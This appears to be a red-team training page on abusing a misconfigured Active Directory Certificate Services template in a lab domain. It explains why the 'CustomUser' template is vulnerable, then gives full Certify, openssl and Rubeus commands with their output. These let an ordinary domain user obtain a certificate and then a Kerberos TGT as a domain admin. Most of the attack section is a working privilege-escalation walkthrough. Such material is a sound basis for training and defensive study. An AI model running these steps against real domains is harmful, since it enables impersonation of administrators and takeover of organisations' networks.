Misconfigured Certificate Templates | What is this changing

Last updated 7 days ago

AD CS certificate templates are provided by Microsoft as a starting point for distributing certificates. They are designed to be duplicated and configured for specific needs. Misconfigurations within these templates can be abused for privilege escalation.

Certify can also find vulnerable templates.

Let's go through the key parts of this output.

This template is served by sub-ca.
The template is called CustomUser.
ENROLLEE_SUPPLIES_SUBJECT is enabled, which allows the certificate requestor to provide any SAN (subject alternative name).
The certificate usage has Client Authentication set.
DEV\Domain Users have enrollment rights, so any domain user may request a certificate from this template.

If a principal you control has WriteOwner, WriteDacl or WriteProperty, then this could also be abused.

This configuration allows any domain user to request a certificate for any other domain user (including a domain admin) and use it for authentication. Request a certificate for nlamb.

Copy the whole certificate (both the private key and certificate) and save it to cert.pem on Ubuntu WSL. Then use the provided openssl command to convert it to pfx format.

Convert cert.pfx into a base64 encoded string so it can be used with Rubeus

Then use asktgt to request a TGT for the user using the certificate.

Last updated 7 days ago

beacon> getuid [*] You are DEV\bfarmer beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb [*] Action: Request a Certificates [*] Current user context : DEV\bfarmer [*] No subject name specified, using current context as subject. [*] Template : CustomUser [*] Subject : CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io [*] AltName : nlamb [*] Certificate Authority : dc-2.dev.cyberbotic.io\sub-ca [*] CA Response : The certificate had been issued. [*] Request ID : 11 [*] cert.pem : -----BEGIN RSA PRIVATE KEY----- [...] -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- [...] -----END CERTIFICATE----- [*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx Certify completed in 00:00:05.4521116

ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx Enter Export Password: pass123 Verifying - Enter Export Password: pass123

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /password:pass123 /nowrap [*] Using PKINIT with etype rc4_hmac and subject: CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io [*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\nlamb' [*] Using domain controller: 10.10.122.10:88 [+] TGT request successful! [*] base64(ticket.kirbi): doIGQj[...]5pbw== ServiceName : krbtgt/dev.cyberbotic.io ServiceRealm : DEV.CYBERBOTIC.IO UserName : nlamb UserRealm : DEV.CYBERBOTIC.IO StartTime : 9/7/2022 8:51:22 AM EndTime : 9/7/2022 6:51:22 PM RenewTill : 9/14/2022 8:51:22 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : AliVFc5Nk93Z7IUkweCnBQ== ASREP (key) : 4DB9D9D76701696109C28A26D27DE0B0